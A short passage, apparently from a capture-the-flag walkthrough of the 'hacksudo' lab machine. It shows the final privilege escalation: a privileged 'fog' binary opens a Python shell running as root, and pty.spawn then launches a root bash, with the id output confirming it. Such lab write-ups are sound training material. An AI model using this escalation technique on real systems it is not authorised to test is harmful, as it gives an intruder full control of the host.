Run fog to get a python shell; check id, it's root.
isro@hacksudo:~/fog$ ./fog
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os;os.system("id");
uid=0(root) gid=1003(isro) groups=1003(isro)
0
Spawn a root shell.
>>> import pty;pty.spawn("/bin/bash");
┌──(root💀hacksudo)-[~/fog]
└─# id;hostname
uid=0(root) gid=1003(isro) groups=1003(isro)
hacksudo
┌──(root💀hacksudo)-[~/fog]